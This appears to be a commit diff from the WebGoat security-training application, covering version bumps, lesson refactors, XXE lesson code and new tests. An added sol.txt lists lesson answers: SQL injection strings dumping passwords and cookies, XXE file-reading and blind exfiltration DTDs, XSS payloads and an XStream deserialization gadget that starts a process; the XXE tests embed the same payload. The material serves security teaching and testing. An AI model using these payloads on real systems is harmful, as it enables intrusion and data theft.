}

3
webgoat-lessons/csrf/webgoat-lesson-template/src/main/resources/lessonPlans/en/lesson-template-attack.adoc
View File

@ -1,3 +0,0 @@
=== Attack Explanation
Explanation of attack here ... Instructions etc.

19
webgoat-lessons/csrf/webgoat-lesson-template/src/main/resources/lessonPlans/en/lesson-template-intro.adoc
View File

@ -1,19 +0,0 @@
== Lesson Template Intro
This is the lesson template intro.
=== Sub-heading
Check asciidoc for syntax, but more = means smaller headings. You can *bold* text and other things.
=== Structuring files
You should set up all content so that it is these *.adoc files.
=== Images
Images can be refereneced as below including setting style (recommended to use lesson-image as the style). The root is {lesson}/src/main/resources
image::images/firefox-proxy-config.png[Firefox Proxy Config,510,634,style="lesson-image"]

7
webgoat-lessons/csrf/webgoat-lesson-template/src/main/resources/lessonPlans/en/lesson-template-video.adoc
View File

@ -1,7 +0,0 @@
=== More Content, Video too ...
You can structure and format the content however you like. You can even include video if you like (but may be subject to browser support). You may want to make it more pertinent to web application security than this though.
video::video/sample-video.m4v[width=480,start=5]
see http://asciidoctor.org/docs/asciidoc-syntax-quick-reference/#videos for more detail on video syntax

BIN
webgoat-lessons/csrf/webgoat-lesson-template/src/main/resources/video/sample-video.m4v
View File

Binary file not shown.

2
webgoat-lessons/html-tampering/pom.xml
View File

@ -6,7 +6,7 @@
<parent>
<groupId>org.owasp.webgoat.lesson</groupId>
<artifactId>webgoat-lessons-parent</artifactId>
<version>8.0-SNAPSHOT</version>
<version>8.0.0.M3</version>
</parent>
<dependencies>

2
webgoat-lessons/http-basics/pom.xml
View File

@ -6,7 +6,7 @@
<parent>
<groupId>org.owasp.webgoat.lesson</groupId>
<artifactId>webgoat-lessons-parent</artifactId>
<version>8.0-SNAPSHOT</version>
<version>8.0.0.M3</version>
</parent>
</project>

2
webgoat-lessons/http-proxies/pom.xml
View File

@ -6,7 +6,7 @@
<parent>
<groupId>org.owasp.webgoat.lesson</groupId>
<artifactId>webgoat-lessons-parent</artifactId>
<version>8.0-SNAPSHOT</version>
<version>8.0.0.M3</version>
</parent>
<dependencies>

2
webgoat-lessons/idor/pom.xml
View File

@ -6,7 +6,7 @@
<parent>
<groupId>org.owasp.webgoat.lesson</groupId>
<artifactId>webgoat-lessons-parent</artifactId>
<version>8.0-SNAPSHOT</version>
<version>8.0.0.M3</version>
</parent>
</project>

2
webgoat-lessons/insecure-login/pom.xml
View File

@ -6,7 +6,7 @@
<parent>
<groupId>org.owasp.webgoat.lesson</groupId>
<artifactId>webgoat-lessons-parent</artifactId>
<version>8.0-SNAPSHOT</version>
<version>8.0.0.M3</version>
</parent>
<dependencies>

2
webgoat-lessons/jwt/pom.xml
View File

@ -6,7 +6,7 @@
<parent>
<groupId>org.owasp.webgoat.lesson</groupId>
<artifactId>webgoat-lessons-parent</artifactId>
<version>8.0-SNAPSHOT</version>
<version>8.0.0.M3</version>
</parent>
</project>

2
webgoat-lessons/missing-function-ac/pom.xml
View File

@ -6,7 +6,7 @@
<parent>
<groupId>org.owasp.webgoat.lesson</groupId>
<artifactId>webgoat-lessons-parent</artifactId>
<version>8.0-SNAPSHOT</version>
<version>8.0.0.M3</version>
</parent>
</project>

32
webgoat-lessons/pom.xml
View File

@ -5,12 +5,12 @@
<groupId>org.owasp.webgoat.lesson</groupId>
<artifactId>webgoat-lessons-parent</artifactId>
<packaging>pom</packaging>
<version>8.0-SNAPSHOT</version>
<version>8.0.0.M3</version>
<parent>
<groupId>org.owasp.webgoat</groupId>
<artifactId>webgoat-parent</artifactId>
<version>8.0-SNAPSHOT</version>
<version>8.0.0.M3</version>
</parent>
<modules>
@ -27,6 +27,7 @@
<module>xxe</module>
<module>idor</module>
<module>vulnerable-components</module>
<module>webgoat-introduction</module>
<module>webwolf-introduction</module>
<module>auth-bypass</module>
<module>missing-function-ac</module>
@ -42,34 +43,13 @@
<version>${project.version}</version>
<scope>provided</scope>
<type>jar</type>
<!-- Exclude Mongo embedded so testcases do not start it automatically, seems to be
the easiest way to stop the autoconfiguration of Spring Boot -->
<exclusions>
<exclusion>
<groupId>de.flapdoodle.embed</groupId>
<artifactId>de.flapdoodle.embed.mongo</artifactId>
</exclusion>
</exclusions>
</dependency>
<!--<dependency>-->
<!--<groupId>org.apache.commons</groupId>-->
<!--<artifactId>commons-exec</artifactId>-->
<!--<version>1.3</version>-->
<!--</dependency>-->
<dependency>
<groupId>org.owasp.webgoat</groupId>
<artifactId>webgoat-container</artifactId>
<version>${project.version}</version>
<classifier>tests</classifier>
<scope>test</scope>
<!-- Exclude Mongo embedded so testcases do not start it automatically, seems to be
the easiest way to stop the autoconfiguration of Spring Boot -->
<exclusions>
<exclusion>
<groupId>de.flapdoodle.embed</groupId>
<artifactId>de.flapdoodle.embed.mongo</artifactId>
</exclusion>
</exclusions>
</dependency>
<dependency>
<groupId>junit</groupId>
@ -95,12 +75,6 @@
<version>4.1.3.RELEASE</version>
<scope>test</scope>
</dependency>
<dependency>
<groupId>com.github.fakemongo</groupId>
<artifactId>fongo</artifactId>
<version>2.1.0</version>
<scope>test</scope>
</dependency>
<dependency>
<groupId>org.owasp.encoder</groupId>
<artifactId>encoder</artifactId>

92
webgoat-lessons/sol.txt Normal file
View File

@ -0,0 +1,92 @@
### SQLi ###
Basic
Smith - to show it returns smith's records
Smith' or '1'='1 - to show exploit; 1=1 can be any true clause
**Bender Login
bender@juice-sh.op' --
[2:19 PM]
101
101 or 1=1
Smith' union select userid,user_name, password,cookie,cookie, cookie,userid from user_system_data --
Smith' union select all 1, '2' ,user_name,password, 'MC', cookie, 2 from user_system_data --
## XXE ##
Simple - <?xml version="1.0" standalone="yes" ?><!DOCTYPE user [<!ENTITY root SYSTEM "file:///"> ]><comment><text>&root;</text></comment>
Modern Rest Framework - change content type to: Content-Type: application/xml &&
<?xml version="1.0" standalone="yes" ?><!DOCTYPE user [<!ENTITY root SYSTEM "file:///"> ]><user> <username>&root;</username><password>test</password></user>
Blind SendFile ...
/**
* Solution:
*
* Create DTD:
*
* <pre>
* <?xml version="1.0" encoding="UTF-8"?>
* <!ENTITY % file SYSTEM "file:///c:/windows-version.txt">
* <!ENTITY % all "<!ENTITY send SYSTEM 'http://localhost:8080/WebGoat/XXE/ping?text=%file;'>">
* %all;
* </pre>
*
* This will be reduced to:
*
* <pre>
* <!ENTITY send SYSTEM 'http://localhost:8080/WebGoat/XXE/ping?text=[contents_file]'>
* </pre>
*
* Wire it all up in the xml send to the server:
*
* <pre>
* <?xml version="1.0"?>
* <!DOCTYPE root [
* <!ENTITY % remote SYSTEM "http://localhost:8080/WebGoat/plugin_lessons/XXE/test.dtd">
* %remote;
* ]>
* <user>
* <username>test&send;</username>
* </user>
*
* </pre>
*
*/
###XSS ###
<script>alert('my javascript here')</script>4128 3214 0002 1999
DOM-XSS ...
// something like ... http://localhost:8080/WebGoat/start.mvc#test/testParam=foobar&_someVar=234902384lotslsfjdOf9889080GarbageHere%3Cscript%3Ewebgoat.customjs.phoneHome();%3C%2Fscript%3E
// or http://localhost:8080/WebGoat/start.mvc#test/testParam=foobar&_someVar=234902384lotslsfjdOf9889080GarbageHere<script>webgoat.customjs.phoneHome();<%2Fscript>
### Vuln - Components ###
Jquery page: - it is contrived; but paste that in each box
OK<script>alert("XSS")<\/script>
OK<script>alert("XSS")<\/script>
for the deserialization: got to the link: http://www.pwntester.com/blog/2013/12/23/rce-via-xstream-object-deserialization38/ to read about why it works so you can talk to it.
<sorted-set>
<string>foo</string>
<dynamic-proxy>
<interface>java.lang.Comparable</interface>
<handler class="java.beans.EventHandler">
<target class="java.lang.ProcessBuilder">
<command>
<string>/Applications/Calculator.app/Contents/MacOS/Calculator</string>
</command>
</target>
<action>start</action>
</handler>
</dynamic-proxy>
</sorted-set>

2
webgoat-lessons/sql-injection/pom.xml
View File

@ -6,6 +6,6 @@
<parent>
<groupId>org.owasp.webgoat.lesson</groupId>
<artifactId>webgoat-lessons-parent</artifactId>
<version>8.0-SNAPSHOT</version>
<version>8.0.0.M3</version>
</parent>
</project>

2
webgoat-lessons/vulnerable-components/pom.xml
View File

@ -6,7 +6,7 @@
<parent>
<groupId>org.owasp.webgoat.lesson</groupId>
<artifactId>webgoat-lessons-parent</artifactId>
<version>8.0-SNAPSHOT</version>
<version>8.0.0.M3</version>
</parent>
<dependencies>
<dependency>

5
webgoat-lessons/csrf/webgoat-lesson-template/pom.xml → webgoat-lessons/webgoat-introduction/pom.xml
View File

@ -1,12 +1,11 @@
<project xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/maven-v4_0_0.xsd">
<modelVersion>4.0.0</modelVersion>
<artifactId>webgoat-lesson-template</artifactId>
<artifactId>webgoat-introduction</artifactId>
<packaging>jar</packaging>
<parent>
<groupId>org.owasp.webgoat.lesson</groupId>
<artifactId>webgoat-lessons-parent</artifactId>
<version>8.0-SNAPSHOT</version>
<version>8.0.0.M3</version>
</parent>
</project>

11
webgoat-lessons/webgoat-introduction/pom.xml.versionsBackup Normal file
View File

@ -0,0 +1,11 @@
<project xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/maven-v4_0_0.xsd">
<modelVersion>4.0.0</modelVersion>
<artifactId>webwolf-introduction</artifactId>
<packaging>jar</packaging>
<parent>
<groupId>org.owasp.webgoat.lesson</groupId>
<artifactId>webgoat-lessons-parent</artifactId>
<version>8.0-SNAPSHOT</version>
</parent>
</project>

20
webgoat-lessons/csrf/webgoat-lesson-template/src/main/java/org/owasp/webgoat/plugin/LessonTemplate.java → webgoat-lessons/webgoat-introduction/src/main/java/org/owasp/webgoat/plugin/WebGoatIntroduction.java
View File

@ -1,9 +1,9 @@
package org.owasp.webgoat.plugin;
import com.beust.jcommander.internal.Lists;
import org.owasp.webgoat.lessons.Category;
import org.owasp.webgoat.lessons.NewLesson;
import java.util.ArrayList;
import java.util.List;
/**
@ -31,35 +31,33 @@ import java.util.List;
* projects.
* <p>
*
* @author misfir3
* @author WebGoat
* @version $Id: $Id
* @since January 3, 2017
* @since October 12, 2016
*/
public class LessonTemplate extends NewLesson {
public class WebGoatIntroduction extends NewLesson {
@Override
public Category getDefaultCategory() {
return Category.GENERAL;
return Category.INTRODUCTION;
}
@Override
public List<String> getHints() {
return Lists.newArrayList();
return new ArrayList();
}
@Override
public Integer getDefaultRanking() {
return 30;
return 1;
}
@Override
public String getTitle() {
return "lesson-template.title";
return "webgoat.title";
}
@Override
public String getId() {
return "LessonTemplate";
return "WebGoatIntroduction";
}
}

8
webgoat-lessons/webgoat-introduction/src/main/resources/html/WebGoatIntroduction.html Normal file
View File

@ -0,0 +1,8 @@
<!DOCTYPE html>
<html xmlns:th="http://www.thymeleaf.org">
<div class="lesson-page-wrapper">
<div class="adoc-content" th:replace="doc:Introduction.adoc"></div>
</div>
</html>

1
webgoat-lessons/webgoat-introduction/src/main/resources/i18n/WebGoatLabels.properties Normal file
View File

@ -0,0 +1 @@
webgoat.title=WebGoat

BIN
webgoat-lessons/webgoat-introduction/src/main/resources/images/wg_logo.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 4.3 KiB

18
webgoat-lessons/webgoat-introduction/src/main/resources/lessonPlans/en/Introduction.adoc Normal file
View File

@ -0,0 +1,18 @@
== What is WebGoat?
---
WebGoat is a deliberately insecure application that allows interested developers just like you to _test vulnerabilities_
commonly found in Java-based applications that use common and popular open source components.
Now, while we in no way condone causing intentional harm to any animal, goat or otherwise, we think learning everything
you can about security vulnerabilities is essential to understanding just what happens when even a small bit of
unintended code gets into your applications.
What better way to do that than with your very own scapegoat?
Feel free to do what you will with Hack. Poke, prod and if it makes you feel better, scare him until your hearts content.
Go ahead, and Hack the goat. We promise he likes it.
Thanks for your interest!
*The WebGoat Team*

BIN
webgoat-lessons/webgoat-lesson-template/src/main/resources/video/sample-video.m4v
View File

Binary file not shown.

2
webgoat-lessons/webwolf-introduction/pom.xml
View File

@ -6,6 +6,6 @@
<parent>
<groupId>org.owasp.webgoat.lesson</groupId>
<artifactId>webgoat-lessons-parent</artifactId>
<version>8.0-SNAPSHOT</version>
<version>8.0.0.M3</version>
</parent>
</project>

6
webgoat-lessons/webwolf-introduction/src/main/java/org/owasp/webgoat/plugin/MailAssignment.java
View File

@ -22,7 +22,7 @@ public class MailAssignment extends AssignmentEndpoint {
private final String webWolfURL;
private RestTemplate restTemplate;
public MailAssignment(RestTemplate restTemplate, @Value("${webwolf.url}") String webWolfURL) {
public MailAssignment(RestTemplate restTemplate, @Value("${webwolf.url.mail}") String webWolfURL) {
this.restTemplate = restTemplate;
this.webWolfURL = webWolfURL;
}
@ -36,10 +36,10 @@ public class MailAssignment extends AssignmentEndpoint {
.recipient(username)
.title("Test messages from WebWolf")
.time(LocalDateTime.now())
.contents("This is a test message from WebWolf, your unique code is" + StringUtils.reverse(username))
.contents("This is a test message from WebWolf, your unique code is: " + StringUtils.reverse(username))
.sender("webgoat@owasp.org")
.build();
restTemplate.postForEntity(webWolfURL + "/WebWolf/mail", mailEvent, Object.class);
restTemplate.postForEntity(webWolfURL, mailEvent, Object.class);
return informationMessage().feedback("webwolf.email_send").feedbackArgs(email).build();
} else {
return informationMessage().feedback("webwolf.email_mismatch").feedbackArgs(username).build();

7
webgoat-lessons/webwolf-introduction/src/main/resources/html/WebWolfIntroduction.html
View File

@ -2,7 +2,7 @@
<html xmlns:th="http://www.thymeleaf.org">
<div class="lesson-page-wrapper">
<div class="adoc-content" th:replace="doc:Introduction.adoc"></div>
<div class="adoc-content" th:replace="doc:IntroductionWebWolf.adoc"></div>
</div>
<div class="lesson-page-wrapper">
@ -12,9 +12,10 @@
<div class="lesson-page-wrapper">
<div class="adoc-content" th:replace="doc:Receiving_mail.adoc"></div>
<div class="attack-container">
<form accept-charset="UNKNOWN"
<div class="assignment-success"><i class="fa fa-2 fa-check hidden" aria-hidden="true"></i></div>
<form class="attack-form" accept-charset="UNKNOWN"
method="POST" name="form"
action="/WebGoat/WebWolf/send"
action="/WebGoat/WebWolf/mail/send"
enctype="application/json;charset=UTF-8">
<div class="container-fluid">
<div class="row">

3
webgoat-lessons/webwolf-introduction/src/main/resources/lessonPlans/en/Introduction.adoc → webgoat-lessons/webwolf-introduction/src/main/resources/lessonPlans/en/IntroductionWebWolf.adoc
View File

@ -1,5 +1,8 @@
== Introducing WebWolf
NOTE: You only need WebWolf if you a lesson specifies you can use it. For a lot of lessons you use WebGoat without
starting WebWolf.
WebWolf is a separate web application which simulates an attackers machine. It makes it possible for us to
make a clear distinction between what takes place on the attacked website and the actions you need to do as
an "attacker". WebWolf was introduced after a couple of workshops where we received feedback about the fact there

2
webgoat-lessons/xxe/pom.xml
View File

@ -6,7 +6,7 @@
<parent>
<groupId>org.owasp.webgoat.lesson</groupId>
<artifactId>webgoat-lessons-parent</artifactId>
<version>8.0-SNAPSHOT</version>
<version>8.0.0.M3</version>
</parent>
<dependencies>

5
webgoat-lessons/xxe/src/main/java/org/owasp/webgoat/plugin/BlindSendFileAssignment.java
View File

@ -1,7 +1,8 @@
package org.owasp.webgoat.plugin;
import com.google.common.base.Charsets;
import com.google.common.io.Files;
import lombok.SneakyThrows;
import org.apache.commons.io.FileUtils;
import org.owasp.webgoat.assignments.AssignmentEndpoint;
import org.owasp.webgoat.assignments.AssignmentPath;
import org.owasp.webgoat.assignments.AttackResult;
@ -63,7 +64,7 @@ public class BlindSendFileAssignment extends AssignmentEndpoint {
if (!targetDirectory.exists()) {
targetDirectory.mkdir();
}
FileUtils.write(new File(targetDirectory, "secret.txt"), CONTENTS);
Files.write(CONTENTS, new File(targetDirectory, "secret.txt"), Charsets.UTF_8);
}
@RequestMapping(method = RequestMethod.POST, consumes = MediaType.ALL_VALUE, produces = MediaType.APPLICATION_JSON_VALUE)

14
webgoat-lessons/xxe/src/main/java/org/owasp/webgoat/plugin/Comments.java
View File

@ -19,7 +19,13 @@ import javax.xml.stream.XMLStreamReader;
import java.io.IOException;
import java.io.StringReader;
import java.util.Collection;
import java.util.Comparator;
import java.util.Map;
import java.util.Optional;
import java.util.stream.Collectors;
import static java.util.Optional.empty;
import static java.util.Optional.of;
/**
* @author nbaars
@ -50,7 +56,7 @@ public class Comments {
allComments.addAll(xmlComments);
}
allComments.addAll(comments);
return allComments;
return allComments.stream().sorted(Comparator.comparing(Comment::getDateTime).reversed()).collect(Collectors.toList());
}
protected Comment parseXml(String xml) throws Exception {
@ -67,12 +73,12 @@ public class Comments {
return (Comment) unmarshaller.unmarshal(xsr);
}
protected Comment parseJson(String comment) {
protected Optional<Comment> parseJson(String comment) {
ObjectMapper mapper = new ObjectMapper();
try {
return mapper.readValue(comment, Comment.class);
return of(mapper.readValue(comment, Comment.class));
} catch (IOException e) {
return new Comment();
return empty();
}
}

17
webgoat-lessons/xxe/src/main/java/org/owasp/webgoat/plugin/ContentTypeAssignment.java
View File

@ -61,27 +61,26 @@ public class ContentTypeAssignment extends AssignmentEndpoint {
@ResponseBody
public AttackResult createNewUser(@RequestBody String commentStr, @RequestHeader("Content-Type") String contentType) throws Exception {
AttackResult attackResult = failed().build();
Comment comment = null;
if (APPLICATION_JSON_VALUE.equals(contentType)) {
comment = comments.parseJson(commentStr);
comments.addComment(comment, true);
comments.parseJson(commentStr).ifPresent(c -> comments.addComment(c, true));
attackResult = failed().feedback("xxe.content.type.feedback.json").build();
}
if (MediaType.APPLICATION_XML_VALUE.equals(contentType)) {
String error = "";
try {
comment = comments.parseXml(commentStr);
Comment comment = comments.parseXml(commentStr);
comments.addComment(comment, false);
if (checkSolution(comment)) {
attackResult = success().build();
}
} catch (Exception e) {
error = org.apache.commons.lang.exception.ExceptionUtils.getFullStackTrace(e);
attackResult = failed().feedback("xxe.content.type.feedback.xml").output(error).build();
}
attackResult = failed().feedback("xxe.content.type.feedback.xml").output(error).build();
}
if (checkSolution(comment)) {
attackResult = success().build();
}
return trackProgress(attackResult);
}
@ -89,7 +88,7 @@ public class ContentTypeAssignment extends AssignmentEndpoint {
String[] directoriesToCheck = OS.isFamilyUnix() ? DEFAULT_LINUX_DIRECTORIES : DEFAULT_WINDOWS_DIRECTORIES;
boolean success = true;
for (String directory : directoriesToCheck) {
success &= comment.getText().contains(directory);
success &= org.apache.commons.lang3.StringUtils.contains(comment.getText(), directory);
}
return success;
}

3
webgoat-lessons/xxe/src/main/resources/html/XXE.html
View File

@ -26,6 +26,7 @@
method="POST" name="form"
prepareData="simpleXXE"
successCallback="simpleXXECallback"
failureCallback="simpleXXECallback"
contentType="application/xml"
action="/WebGoat/xxe/simple">
<div class="container-fluid">
@ -82,6 +83,7 @@
method="POST" name="form"
prepareData="contentTypeXXE"
successCallback="contentTypeXXECallback"
failureCallback="contentTypeXXECallback"
action="xxe/content-type"
contentType="application/json">
<div class="container-fluid">
@ -147,6 +149,7 @@
method="POST" name="form"
prepareData="blindXXE"
successCallback="blindXXECallback"
failureCallback="blindXXECallback"
action="/WebGoat/xxe/blind"
contentType="application/xml">
<div class="container-fluid">

33
webgoat-lessons/xxe/src/main/resources/js/xxe.js
View File

@ -8,7 +8,7 @@ webgoat.customjs.simpleXXE = function () {
}
webgoat.customjs.simpleXXECallback = function() {
$("#commentInputBlind").val('');
$("#commentInputSimple").val('');
getComments('#commentsListSimple');
}
@ -16,6 +16,25 @@ $(document).ready(function () {
getComments('#commentsListSimple');
});
//// Content-type
webgoat.customjs.contentTypeXXE = function() {
var commentInput = $("#commentInputContentType").val();
return JSON.stringify({text: commentInput});
}
webgoat.customjs.contentTypeXXECallback = function() {
$("#commentInputContentType").val('');
getComments('#commentsListContentType');
}
$(document).ready(function () {
getComments('#commentsListContentType');
});
//// Blind
webgoat.customjs.blindXXE = function() {
var commentInput = $("#commentInputBlind").val();
var xml = '<?xml version="1.0"?>' +
@ -34,19 +53,7 @@ $(document).ready(function () {
getComments('#commentsListBlind');
});
webgoat.customjs.contentTypeXXE = function() {
var commentInput = $("#commentInputContentType").val();
return JSON.stringify({text: commentInput});
}
webgoat.customjs.contentTypeXXECallback = function() {
$("#commentInputContentType").val('');
getComments('#commentsListContentType');
}
$(document).ready(function () {
getComments('#commentsListContentType');
});
var html = '<li class="comment">' +
'<div class="pull-left">' +

75
webgoat-lessons/xxe/src/test/java/org/owasp/webgoat/plugin/ContentTypeAssignmentTest.java Normal file
View File

@ -0,0 +1,75 @@
package org.owasp.webgoat.plugin;
import org.hamcrest.CoreMatchers;
import org.junit.Before;
import org.junit.Test;
import org.junit.runner.RunWith;
import org.owasp.webgoat.plugins.LessonTest;
import org.springframework.beans.factory.annotation.Autowired;
import org.springframework.http.MediaType;
import org.springframework.test.context.junit4.SpringJUnit4ClassRunner;
import org.springframework.test.web.servlet.request.MockMvcRequestBuilders;
import org.springframework.test.web.servlet.setup.MockMvcBuilders;
import static org.assertj.core.api.Assertions.assertThat;
import static org.mockito.Mockito.when;
import static org.springframework.test.web.servlet.result.MockMvcResultMatchers.jsonPath;
import static org.springframework.test.web.servlet.result.MockMvcResultMatchers.status;
/**
* @author nbaars
* @since 11/2/17.
*/
@RunWith(SpringJUnit4ClassRunner.class)
public class ContentTypeAssignmentTest extends LessonTest {
@Autowired
private Comments comments;
@Before
public void setup() throws Exception {
XXE xxe = new XXE();
when(webSession.getCurrentLesson()).thenReturn(xxe);
this.mockMvc = MockMvcBuilders.webAppContextSetup(this.wac).build();
when(webSession.getUserName()).thenReturn("unit-test");
}
@Test
public void sendingXmlButContentTypeIsJson() throws Exception {
mockMvc.perform(MockMvcRequestBuilders.post("/xxe/content-type")
.contentType(MediaType.APPLICATION_JSON)
.content("<?xml version=\"1.0\" standalone=\"yes\" ?><!DOCTYPE user [<!ENTITY root SYSTEM \"file:///\"> ]><comment><text>&root;</text></comment>"))
.andExpect(status().isOk())
.andExpect(jsonPath("$.feedback", CoreMatchers.is(messages.getMessage("xxe.content.type.feedback.json"))));
}
@Test
public void workingAttack() throws Exception {
mockMvc.perform(MockMvcRequestBuilders.post("/xxe/content-type")
.contentType(MediaType.APPLICATION_XML)
.content("<?xml version=\"1.0\" standalone=\"yes\" ?><!DOCTYPE user [<!ENTITY root SYSTEM \"file:///\"> ]><comment><text>&root;</text></comment>"))
.andExpect(status().isOk())
.andExpect(jsonPath("$.feedback", CoreMatchers.is(messages.getMessage("assignment.solved"))));
}
@Test
public void postingJsonShouldAddComment() throws Exception {
mockMvc.perform(MockMvcRequestBuilders.post("/xxe/content-type")
.contentType(MediaType.APPLICATION_JSON)
.content("{ \"text\" : \"Hello World\"}"))
.andExpect(status().isOk())
.andExpect(jsonPath("$.feedback", CoreMatchers.is(messages.getMessage("xxe.content.type.feedback.json"))));
assertThat(comments.getComments().stream().filter(c -> c.getText().equals("Hello World")).count()).isEqualTo(1);
}
@Test
public void postingInvalidJsonShouldAddComment() throws Exception {
mockMvc.perform(MockMvcRequestBuilders.post("/xxe/content-type")
.contentType(MediaType.APPLICATION_JSON)
.content("{ 'text' : 'Wrong'"))
.andExpect(status().isOk())
.andExpect(jsonPath("$.feedback", CoreMatchers.is(messages.getMessage("xxe.content.type.feedback.json"))));
assertThat(comments.getComments().stream().filter(c -> c.getText().equals("Wrong")).count()).isEqualTo(0);
}
}

66
webgoat-lessons/xxe/src/test/java/org/owasp/webgoat/plugin/SimpleXXETest.java Normal file
View File

@ -0,0 +1,66 @@
package org.owasp.webgoat.plugin;
import org.hamcrest.CoreMatchers;
import org.junit.Before;
import org.junit.Test;
import org.junit.runner.RunWith;
import org.owasp.webgoat.plugins.LessonTest;
import org.springframework.test.context.junit4.SpringJUnit4ClassRunner;
import org.springframework.test.web.servlet.request.MockMvcRequestBuilders;
import org.springframework.test.web.servlet.setup.MockMvcBuilders;
import static org.mockito.Mockito.when;
import static org.springframework.test.web.servlet.result.MockMvcResultMatchers.jsonPath;
import static org.springframework.test.web.servlet.result.MockMvcResultMatchers.status;
/**
* @author nbaars
* @since 11/2/17.
*/
@RunWith(SpringJUnit4ClassRunner.class)
public class SimpleXXETest extends LessonTest {
@Before
public void setup() throws Exception {
XXE xxe = new XXE();
when(webSession.getCurrentLesson()).thenReturn(xxe);
this.mockMvc = MockMvcBuilders.webAppContextSetup(this.wac).build();
when(webSession.getUserName()).thenReturn("unit-test");
}
@Test
public void workingAttack() throws Exception {
//Call with XXE injection
mockMvc.perform(MockMvcRequestBuilders.post("/xxe/simple")
.content("<?xml version=\"1.0\" standalone=\"yes\" ?><!DOCTYPE user [<!ENTITY root SYSTEM \"file:///\"> ]><comment><text>&root;</text></comment>"))
.andExpect(status().isOk())
.andExpect(jsonPath("$.feedback", CoreMatchers.is(messages.getMessage("assignment.solved"))));
}
@Test
public void postingJsonCommentShouldNotSolveAssignment() throws Exception {
mockMvc.perform(MockMvcRequestBuilders.post("/xxe/simple")
.content("<comment><text>test</ext></comment>"))
.andExpect(status().isOk())
.andExpect(jsonPath("$.feedback", CoreMatchers.is(messages.getMessage("assignment.not.solved"))));
}
@Test
public void postingXmlCommentWithoutXXEShouldNotSolveAssignment() throws Exception {
mockMvc.perform(MockMvcRequestBuilders.post("/xxe/simple")
.content("<?xml version=\"1.0\" standalone=\"yes\" ?><comment><text>&root;</text></comment>"))
.andExpect(status().isOk())
.andExpect(jsonPath("$.feedback", CoreMatchers.is(messages.getMessage("assignment.not.solved"))));
}
@Test
public void postingPlainTextShouldShwoException() throws Exception {
mockMvc.perform(MockMvcRequestBuilders.post("/xxe/simple")
.content("test"))
.andExpect(status().isOk())
.andExpect(jsonPath("$.output", CoreMatchers.startsWith("javax.xml.bind.UnmarshalException\\n - with linked exception")))
.andExpect(jsonPath("$.feedback", CoreMatchers.is(messages.getMessage("assignment.not.solved"))));
}
}